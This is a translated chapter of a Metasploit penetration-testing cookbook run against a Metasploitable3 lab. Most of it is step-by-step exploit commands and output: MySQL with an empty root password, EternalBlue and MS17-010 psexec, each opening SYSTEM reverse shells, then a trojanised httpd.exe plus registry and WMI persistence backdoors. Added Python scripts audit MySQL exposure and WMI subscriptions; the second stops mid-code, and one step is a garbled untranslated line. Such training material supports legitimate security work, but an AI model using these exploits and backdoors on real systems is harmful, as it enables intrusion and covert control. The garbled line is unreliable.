Metasploit Penetration Testing Cookbook, Third Edition. Chapter 3: Server-Side Exploitation (2) (translation)

Continued from: Metasploit Penetration Testing Cookbook, Third Edition. Chapter 3: Server-Side Exploitation (1)

5. Exploiting common services

When exploiting vulnerabilities, some services are related to most of the other services on the target, yet in most cases they get overlooked.

Getting ready

In this recipe we will exploit one of the most common and most easily abused services in target environments: MySQL. In most cases MySQL can be exploited because it was installed for development purposes and basic hardening was skipped, such as setting a root password at all, or setting a strong one.

In this recipe we use Metasploitable3 as the target machine.

How to do it

To exploit the target's MySQL service, we first enumerate the target with the MySQL enumeration module, then use the Oracle MySQL for Microsoft Windows Payload exploit module to get a shell on the remote host.

TIP: the mysql_payload module has been removed from newer versions of Metasploit. You can download it from https://www.exploit-db.com/download/16957, place it in the matching Metasploit module directory (/usr/share/metasploit-framework/modules/exploits/windows/mysql), and change the first few lines of the code to the following.

##
# $Id: mysql_payload.rb 11899 2011-03-08 22:42:26Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Current Metasploit versions load modules by the MetasploitModule class name,
# so the Metasploit3 class name of the 2011 module is replaced here.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MYSQL
  include Msf::Exploit::CmdStager


Enumeration:

msf5 auxiliary(admin/mysql/mysql_enum) > use auxiliary/admin/mysql/mysql_enum
msf5 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 auxiliary(admin/mysql/mysql_enum) > set USERNAME root
USERNAME => root
msf5 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.177.144

[*] 192.168.177.144:3306 - Running MySQL Enumerator...
[*] 192.168.177.144:3306 - Enumerating Parameters
[*] 192.168.177.144:3306 -      MySQL Version: 5.5.20-log
[*] 192.168.177.144:3306 -      Compiled for the following OS: Win64
[*] 192.168.177.144:3306 -      Architecture: x86
[*] 192.168.177.144:3306 -      Server Hostname: metasploitable3
[*] 192.168.177.144:3306 -      Data Directory: c:\wamp\bin\mysql\mysql5.5.20\data\
[*] 192.168.177.144:3306 -      Logging of queries and logins: OFF
[*] 192.168.177.144:3306 -      Old Password Hashing Algorithm OFF
[*] 192.168.177.144:3306 -      Loading of local files: ON
[*] 192.168.177.144:3306 -      Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.168.177.144:3306 -      Allow Use of symlinks for Database Files: YES
[*] 192.168.177.144:3306 -      Allow Table Merge:
[*] 192.168.177.144:3306 -      SSL Connection: DISABLED
[*] 192.168.177.144:3306 - Enumerating Accounts:
[*] 192.168.177.144:3306 -      List of Accounts with Password Hashes:
[+] 192.168.177.144:3306 -              User: root Host: localhost Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: 127.0.0.1 Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: ::1 Password Hash:
[+] 192.168.177.144:3306 -              User:  Host: localhost Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: % Password Hash:
[*] 192.168.177.144:3306 -      The following users have GRANT Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -      The following users have CREATE USER Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have RELOAD Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have SHUTDOWN Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have SUPER Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have FILE Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have PROCESS Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following accounts have privileges to the mysql database:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      Anonymous Accounts are Present:
[*] 192.168.177.144:3306 -              User:  Host: localhost
[*] 192.168.177.144:3306 -      The following accounts have empty passwords:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User:  Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following accounts are not restricted by source:
[*] 192.168.177.144:3306 -              User: root Host: %
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mysql/mysql_enum) >

Exploitation:

msf5> use exploit/windows/mysql/mysql_payload
msf5 exploit(windows/mysql/mysql_payload) > show options
msf5 exploit(windows/mysql/mysql_payload) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/mysql/mysql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/mysql/mysql_payload) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/mysql/mysql_payload) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/mysql/mysql_payload) > exploit
[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:3306 - Checking target architecture...
[*] 192.168.177.144:3306 - Checking for sys_exec()...
[*] 192.168.177.144:3306 - sys_exec() already available, using that (override with FORCE_UDF_UPLOAD).
[*] 192.168.177.144:3306 - Command Stager progress -   1.47% done (1499/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   2.93% done (2998/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   4.40% done (4497/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   5.86% done (5996/102246 bytes)
......
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] 192.168.177.144:3306 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:55358) at 2019-04-26 16:25:45 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Because the target's MySQL had no root password set, the MySQL service could be used to upload a shell and gain remote access to the system, as shown above. So never forget to test the basic services, even if you think nobody would be foolish enough to run a service without a password.
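The mysql_enum output above is also what a defender should review. The following script is an added example, not code from the book or from Metasploit: it parses output in that format (the sample below is constructed to mirror it, with a hypothetical hashed 'app' account added) and reports the misconfigurations this recipe relies on: empty and anonymous accounts, accounts reachable from any host, high privileges on exposed accounts, local_infile enabled, and SSL disabled.

```python
import re
from collections import defaultdict

# Constructed sample in the layout of the mysql_enum output above (the hashed
# 'app' account is made up so that one account produces no finding).
SAMPLE_ENUM_OUTPUT = """\
[*] 192.168.177.144:3306 - Enumerating Parameters
[*] 192.168.177.144:3306 -      MySQL Version: 5.5.20-log
[*] 192.168.177.144:3306 -      Old Password Hashing Algorithm OFF
[*] 192.168.177.144:3306 -      Loading of local files: ON
[*] 192.168.177.144:3306 -      SSL Connection: DISABLED
[*] 192.168.177.144:3306 - Enumerating Accounts:
[*] 192.168.177.144:3306 -      List of Accounts with Password Hashes:
[+] 192.168.177.144:3306 -              User: root Host: localhost Password Hash:
[+] 192.168.177.144:3306 -              User:  Host: localhost Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: % Password Hash:
[+] 192.168.177.144:3306 -              User: app Host: 10.0.0.5 Password Hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[*] 192.168.177.144:3306 -      The following users have FILE Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have SUPER Privilege:
[*] 192.168.177.144:3306 -              User: app Host: 10.0.0.5
[*] Auxiliary module execution completed
"""

# "[*] host:port - <body>"; lines without the host:port prefix are framework chatter.
LINE_RE = re.compile(r"^\[[*+!-]\] \S+:\d+ - (.*)$")
# "User: <name> Host: <host>[ Password Hash: <hash>]"; name and hash may be empty.
ACCOUNT_RE = re.compile(r"^User: ?(\S*) Host: (\S+)(?: Password Hash: ?(\S*))?$")
HIGH_PRIVS = {"FILE", "SUPER", "GRANT", "CREATE USER", "PROCESS", "RELOAD", "SHUTDOWN"}

def parse_enum(text):
    """Return (parameters, accounts, privileges) from mysql_enum console output."""
    params = {}
    accounts = []             # (user, host, password_hash) from the hash listing
    privs = defaultdict(set)  # privilege name -> {(user, host)}
    section = None
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        body = m.group(1).strip()
        acct = ACCOUNT_RE.match(body)
        if acct:
            user, host, pw_hash = acct.groups()
            if section == "hashes":
                accounts.append((user, host, pw_hash or ""))
            elif section:
                privs[section].add((user, host))
        elif body == "List of Accounts with Password Hashes:":
            section = "hashes"
        elif body.startswith("The following users have ") and body.endswith(" Privilege:"):
            section = body[len("The following users have "):-len(" Privilege:")]
        elif body.endswith(":"):
            section = None    # any other heading: its entries are not needed
        elif body.startswith("Old Password Hashing Algorithm "):
            params["Old Password Hashing Algorithm"] = body.rsplit(" ", 1)[1]
        elif ": " in body:
            key, _, value = body.partition(": ")
            params[key] = value
    return params, accounts, privs

def audit(text):
    """Turn mysql_enum output into a list of findings a DBA should fix."""
    params, accounts, privs = parse_enum(text)
    no_password = {(u, h) for u, h, pw in accounts if pw == ""}
    findings = []
    for user, host, _ in accounts:
        name = f"'{user}'@'{host}'"
        if (user, host) in no_password:
            findings.append(f"empty password: {name}")
        if user == "":
            findings.append(f"anonymous account: {name}")
        if host == "%":
            findings.append(f"reachable from any host: {name}")
    # High privileges matter most on accounts that are already exposed.
    for priv in sorted(HIGH_PRIVS & set(privs)):
        for user, host in sorted(privs[priv]):
            if host == "%" or (user, host) in no_password:
                findings.append(f"{priv} privilege on exposed account: '{user}'@'{host}'")
    if params.get("Loading of local files") == "ON" and "FILE" in privs:
        findings.append("local_infile ON plus FILE privilege: file read/write through SQL")
    if params.get("SSL Connection") == "DISABLED":
        findings.append("SSL disabled: credentials and queries cross the network in clear text")
    if params.get("Old Password Hashing Algorithm") == "ON":
        findings.append("old_passwords ON: weak pre-4.1 password hashes in use")
    return findings
```

Feed it the saved console output of a real run (for example `audit(open("mysql_enum.log").read())`) and each finding maps to a concrete fix: set passwords, drop the anonymous user, restrict hosts, revoke FILE, and disable local_infile.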

6. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

Using the information collected during the information gathering and scanning phases again, in particular the output of the MS17-010 SMB RCE Detection auxiliary module, we can move on to the next vulnerable service.

Getting ready

The MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit module comes from the Equation Group's ETERNALBLUE, part of the FuzzBunch toolkit that the Shadow Brokers obtained from the US National Security Agency (NSA) and released publicly. ETERNALBLUE is generally believed to have been developed by the NSA. It exploits incorrect logic in srv.sys when handling SrvOs2FeaListSizeToNt, which leads to an out-of-bounds copy and a buffer overflow, and in turn allows arbitrary commands to be executed. After its release it was used in the WannaCry ransomware attacks. The vulnerability affects every Windows workstation and server running the SMBv1 service that has not installed the SMB security update.

How to do it

Load the ms17_010_eternalblue module, set the target IP address and the payload, then run the exploit.

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:445 - Connecting to target for exploitation.
[+] 192.168.177.144:445 - Connection established for exploitation.
[+] 192.168.177.144:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.177.144:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.177.144:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.177.144:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 192.168.177.144:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.177.144:445 - 0x00000030  6b 20 31                                         k 1
[+] 192.168.177.144:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.177.144:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.177.144:445 - Sending all but last fragment of exploit packet
[*] 192.168.177.144:445 - Starting non-paged pool grooming
[+] 192.168.177.144:445 - Sending SMBv2 buffers
[+] 192.168.177.144:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.177.144:445 - Sending final SMBv2 buffers.
[*] 192.168.177.144:445 - Sending last fragment of exploit packet!
[*] 192.168.177.144:445 - Receiving response from exploit packet
[+] 192.168.177.144:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.177.144:445 - Sending egg to corrupted connection.
[*] 192.168.177.144:445 - Triggering free of corrupted buffer.
[*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:49655) at 2019-04-26 17:40:54 +0800
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

7. MS17-010 EternalRomance/EternalSynergy/EternalChampion

The MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution exploit module can also be used to exploit MS17-010. It is more reliable than EternalBlue, but it requires a named pipe.

How to do it

Use the ms17_010_psexec module

msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/smb/ms17_010_psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:445 - Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.177.144:445 - Built a write-what-where primitive...
[+] 192.168.177.144:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.177.144:445 - Selecting PowerShell target
[*] 192.168.177.144:445 - Executing the payload...
[+] 192.168.177.144:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] Meterpreter session 2 opened (192.168.177.143:4444 -> 192.168.177.144:62432) at 2019-04-28 09:37:48 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

8. Installing backdoors

After obtaining a shell, if we need to keep persistent access to the target system, we need to install a backdoor.

Getting ready

Through the previous exploits we already have a session on the target machine, and we will use that meterpreter session to install a backdoor service, using httpd.exe as the example.

meterpreter > ps -S httpd.exe
Filtering on 'httpd.exe'
Process List
============
 PID   PPID  Name               Arch  Session  User                        Path
 ---   ----  ----               ----  -------  ----                        ----
 1304  1816  dcserverhttpd.exe  x86   0        NT AUTHORITY\LOCAL SERVICE  C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe
 1816  472   dcserverhttpd.exe  x86   0        NT AUTHORITY\LOCAL SERVICE  C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe
 3180  472   httpd.exe          x64   0        NT AUTHORITY\LOCAL SERVICE  C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe
 3880  3180  httpd.exe          x64   0        NT AUTHORITY\LOCAL SERVICE  C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe
meterpreter >

Next, we will use the Windows registry persistence module to install a backdoor that starts with the system.

Finally, we will use WMI (Windows Management Instrumentation) to create a fileless backdoor.

How to do it

1彻磁、不能在程序運行的時候安裝后門碍沐,所以先殺死進程

meterpreter > kill 3880
Killing: 3880
meterpreter >

2. Download the program that will be replaced by the backdoor

meterpreter > download C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe
[*] Downloading: C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] Downloaded 21.00 KiB of 21.00 KiB (100.0%): C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] download   : C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
meterpreter >

3. Background the session, select the reverse_tcp payload and generate the backdoor file with generate.

msf5 exploit(windows/smb/ms17_010_psexec) > use payload/windows/x64/meterpreter/reverse_tcp
msf5 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -p Windows -x /root/httpd.exe -k -f exe -o /root/httpd-backdoored.exe
[*] Writing 29184 bytes to /root/httpd-backdoored.exe...
msf5 payload(windows/x64/meterpreter/reverse_tcp) >

For an explanation of the generate options, see the help output

msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:

    -E        Force encoding
    -O <opt>  Deprecated: alias for the '-o' option
    -P <opt>  Total desired payload size, auto-produce approproate NOPsled length
    -S <opt>  The new section name to use when generating (large) Windows binaries
    -b <opt>  The list of characters to avoid example: '\x00\xff'
    -e <opt>  The encoder to use
    -f <opt>  Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
    -h        Show this message
    -i <opt>  The number of times to encode the payload
    -k        Preserve the template behavior and inject the payload as a new thread
    -n <opt>  Prepend a nopsled of [length] size on to the payload
    -o <opt>  The output file name (otherwise stdout)
    -p <opt>  The platform of the payload
    -s <opt>  NOP sled length.
    -x <opt>  Specify a custom executable file to use as a template

4. Start a handler to listen for the backdoor's reverse connection, and run it in the background with exploit -j

msf5 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.177.143:4444
msf5 exploit(multi/handler) >

5. Switch back to the previous meterpreter session, upload the backdoor file and rename it.

msf5 exploit(multi/handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > cd C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
meterpreter > mv httpd.exe httpd.exe.backup
meterpreter > upload /root/httpd-backdoored.exe
[*] uploading  : /root/httpd-backdoored.exe -> httpd-backdoored.exe
[*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd-backdoored.exe -> httpd-backdoored.exe
[*] uploaded   : /root/httpd-backdoored.exe -> httpd-backdoored.exe
meterpreter > mv httpd-backdoored.exe httpd.exe
meterpreter >

6. Use the shell command to enter the target system's shell and restart the wampapache service.

meterpreter > shell
Process 1976 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\wamp\bin\apache\apache2.2.21\bin>net stop wampapache
net stop wampapache
The wampapache service is stopping.net sta
The wampapache service was stopped successfully.
C:\wamp\bin\apache\apache2.2.21\bin>net start wampapache

[*] Sending stage (206403 bytes) to 192.168.177.144
net start wampapache
The wampapache service is starting.
The wampapache service was started successfully.

You will see that after the service starts, new sessions come back

C:\wamp\bin\apache\apache2.2.21\bin>[*] Meterpreter session 4 opened (192.168.177.143:4444 -> 192.168.177.144:63068) at 2019-04-28 10:32:44 +0800
[*] Sending stage (206403 bytes) to 192.168.177.144
[*] Meterpreter session 5 opened (192.168.177.143:4444 -> 192.168.177.144:63069) at 2019-04-28 10:32:59 +0800
....
msf5 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                   Connection
  --  ----  ----                     -----------                                   ----------
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ METASPLOITABLE3         192.168.177.143:4444 -> 192.168.177.144:62506 (192.168.177.144)
  4         meterpreter x64/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.177.143:4444 -> 192.168.177.144:63068 (192.168.177.144)
  5         meterpreter x64/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.177.143:4444 -> 192.168.177.144:63069 (192.168.177.144)

msf5 exploit(multi/handler) >

7. Plant the backdoor with the Windows registry persistence module. We use the session obtained with the EternalBlue exploit for this.

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/registry_persistence
msf5 exploit(windows/local/registry_persistence) > set SESSION 6
SESSION => 6
msf5 exploit(windows/local/registry_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/registry_persistence) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/local/registry_persistence) > set LPORT 9999
msf5 exploit(windows/local/registry_persistence) > exploit

[*] Generating payload blob..
[+] Generated payload, 5944 bytes
[*] Root path is HKCU
[*] Installing payload blob..
[+] Created registry key HKCU\Software\cPH3pG4G
[+] Installed payload blob to HKCU\Software\cPH3pG4G\q3jhQYTs
[*] Installing run key
[-] Exploit aborted due to failure: unknown: Could not install run key
msf5 exploit(windows/local/registry_persistence) >

Because of an environment problem, the backdoor was not installed successfully here.

8. If it succeeds, set up a handler so that a reverse shell session is obtained when the target reboots

msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.177.143:9999
msf5 exploit(multi/handler) >

9. After the target machine reboots, a session is obtained

meterpreter > reboot
Rebooting...

10. Create a fileless backdoor using a WMI event subscription

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/wmi_persistence
msf5 exploit(windows/local/wmi_persistence) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/wmi_persistence) > set CALLBACK_INTERVAL 60000 // set the callback interval to 1 minute
CALLBACK_INTERVAL => 60000
msf5 exploit(windows/local/wmi_persistence) > set EVENT_ID_TRIGGER 4624 // set the event ID
EVENT_ID_TRIGGER => 4624
msf5 exploit(windows/local/wmi_persistence) > set USERNAME_TRIGGER Administrator // set the user
USERNAME_TRIGGER => Administrator
msf5 exploit(windows/local/wmi_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/wmi_persistence) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/local/wmi_persistence) > set LPORT 4433
LPORT => 4433
msf5 exploit(windows/local/wmi_persistence) > exploit

[-] This module cannot run as System

11. The module reports that it cannot run as System. We can use migrate to move the meterpreter shell process, that is, migrate the meterpreter process into a relatively stable application process.

msf5 exploit(windows/local/wmi_persistence) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps

Process List
============

 PID   PPID  Name                           Arch  Session  User                          Path
 ---   ----  ----                           ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                         x64   0
 232   4     smss.exe                       x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 300   472   svchost.exe                    x64   0        NT AUTHORITY\NETWORK SERVICE
 316   304   csrss.exe                      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 324   5624  explorer.exe                   x64   1        METASPLOITABLE3\vagrant       C:\Windows\Explorer.EXE
 .....
meterpreter > migrate -N explorer.exe // process migration does not always succeed; try a few more times
[*] Migrating from 1088 to 5624...
[*] Migration completed successfully.
meterpreter >

Then run the exploit again

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/local/wmi_persistence) > exploit

[*] Installing Persistence...
[+]  - Bytes remaining: 12560
[+]  - Bytes remaining: 4560
[+] Payload successfully staged.
[+] Persistence installed! Call a shell using "smbclient \\\\192.168.177.144\\C$ -U Administrator <arbitrary password>"
[*] Clean up Meterpreter RC file: /root/.msf4/logs/wmi_persistence/192.168.177.144_20190428.2114/192.168.177.144_20190428.2114.rc
msf5 exploit(windows/local/wmi_persistence) >

Log out of the target machine and log back in; msfconsole will then receive the callback session

[*] Meterpreter session 2 opened (192.168.177.143:4433 -> 192.168.177.144:49437) at 2019-04-28 12:27:54 +0800

msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
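The defender's counterpart to steps 10 and 11: an added triage script, not from the book or from the wmi_persistence module, that assumes the fileless backdoor is a WMI subscription made of an __EventFilter, a consumer and a __FilterToConsumerBinding in root\subscription, reads the "Key : Value" list that Get-WmiObject prints for those classes, and explains why a binding deserves a look. The sample records are constructed, and the default SCM Event Log subscription that ships with Windows is included as a benign baseline.

```python
import re

# Constructed sample: two filter/consumer/binding triples from root\subscription in the
# "Key : Value" list layout that Get-WmiObject prints. The first mimics what a logon-
# triggered WMI backdoor leaves behind (names and payload made up); the second is the
# default SCM Event Log subscription that ships with Windows.
SAMPLE_SUBSCRIPTIONS = """\
__CLASS             : __EventFilter
Name                : qYvK2p
Query               : SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND TargetInstance.EventCode = '4624' AND TargetInstance.Message LIKE '%Administrator%'
QueryLanguage       : WQL

__CLASS             : CommandLineEventConsumer
Name                : qYvK2p
CommandLineTemplate : powershell.exe -NoP -NonI -W Hidden -Enc AAAAAAAAAAAAAAAAAAAAAAAA

__CLASS             : __FilterToConsumerBinding
Filter              : __EventFilter.Name="qYvK2p"
Consumer            : CommandLineEventConsumer.Name="qYvK2p"

__CLASS             : __EventFilter
Name                : SCM Event Log Filter
Query               : select * from MSFT_SCMEventLogEvent
QueryLanguage       : WQL

__CLASS             : NTEventLogEventConsumer
Name                : SCM Event Log Consumer

__CLASS             : __FilterToConsumerBinding
Filter              : __EventFilter.Name="SCM Event Log Filter"
Consumer            : NTEventLogEventConsumer.Name="SCM Event Log Consumer"
"""

RISKY_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# Filter that polls the Security log for logon events (EventCode 4624).
LOGON_TRIGGER_RE = re.compile(r"Win32_NTLogEvent.*EventCode\s*=\s*'?4624'?", re.I)
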